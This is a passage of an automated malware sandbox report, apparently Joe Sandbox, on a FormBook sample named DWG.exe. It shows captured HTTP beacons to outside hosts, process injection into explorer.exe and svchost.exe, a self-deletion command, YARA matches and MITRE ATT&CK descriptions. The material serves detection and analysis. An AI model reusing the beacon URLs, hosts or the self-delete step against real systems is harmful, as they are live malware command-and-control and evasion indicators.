67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49817	5.157.87.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 07:40:58.862319946 CEST	6008	OUT	GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1 Host: www.thebrandstudiointernational.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2021 07:40:58.888703108 CEST	6008	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 28 Oct 2021 05:40:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.1.30 Data Raw: 31 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 65 7a 65 20 64 6f 6d 65 69 6e 6e 61 61 6d 20 69 73 20 67 65 72 65 67 69 73 74 72 65 65 72 64 20 64 6f 6f 72 20 65 65 6e 20 6b 6c 61 6e 74 20 76 61 6e 20 59 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 2f 70 61 72 6b 65 65 72 70 61 67 69 6e 61 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 15f<!DOCTYPE html><html><head><title>Deze domeinnaam is geregistreerd door een klant van Yourhosting.nl</title><meta http-equiv="pragma" content="no-cache"></head><body><iframe style="top:0px;left:0px; width:100%; height:100%; position:absolute" frameborder="0" scrolling="auto" src="https://www.yourhosting.nl/parkeerpagina.html"></iframe></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49818	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 07:41:10.336775064 CEST	6010	OUT	GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1 Host: www.theravewizards.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: DWG.exe PID: 6272 Parent PID: 3672

General

Start time:	07:39:06
Start date:	28/10/2021
Path:	C:\Users\user\Desktop\DWG.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\DWG.exe'
Imagebase:	0x400000
File size:	626688 bytes
MD5 hash:	FF882802D113ED02FA070C496F89D797
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: DWG.exe PID: 6240 Parent PID: 6272

General

Start time:	07:39:25
Start date:	28/10/2021
Path:	C:\Users\user\Desktop\DWG.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DWG.exe
Imagebase:	0x400000
File size:	626688 bytes
MD5 hash:	FF882802D113ED02FA070C496F89D797
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3352 Parent PID: 6240

General

Start time:	07:39:27
Start date:	28/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: svchost.exe PID: 6564 Parent PID: 3352

General

Start time:	07:39:46
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x280000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 6584 Parent PID: 6564

General

Start time:	07:39:50
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\DWG.exe'
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6604 Parent PID: 6584

General

Start time:	07:39:51
Start date:	28/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report DWG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets